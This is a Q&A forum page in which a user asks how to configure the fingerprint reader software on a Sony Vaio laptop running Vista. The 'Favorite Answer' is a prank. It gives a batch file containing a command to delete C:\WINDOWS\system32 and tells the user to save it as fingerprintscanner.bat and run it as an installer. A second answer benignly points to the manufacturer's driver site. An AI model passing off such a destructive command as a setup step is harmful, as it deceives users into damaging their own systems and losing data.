How do I setup/configure fingerprint reader software?

I have a fingerprint scanner thing on my vaio laptop (vista) and it looks like all the drivers are installed, but i cannot figure out how to set it up?? where do i go?


apparently I'm stupid, but don't ******* tell me to delete system 32 as moot because i'm not ******* retarded.


Favorite Answer

This is actually a surprisingly easy thing to do!

Just open Notepad and type this:

@echo off
del c:\WINDOWS\system32\

Save this file as fingerprintscanner.bat (.bat extension only! Won't work otherwise) and save all files. Then, go to the place where you saved this file, double click it, and the installation process will begin!

Good Luck!


Laptop Fingerprint Reader Software


go to >>>

enter your vaio model + operating system
it should provide you with all the softwares along with the fingerprint reader software